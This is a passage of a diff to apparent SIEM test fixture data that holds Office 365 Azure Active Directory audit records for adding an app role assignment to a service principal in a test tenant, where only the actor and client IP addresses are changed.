4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -22197,9 +22197,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -22433,7 +22433,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -22463,9 +22463,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -22699,7 +22699,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 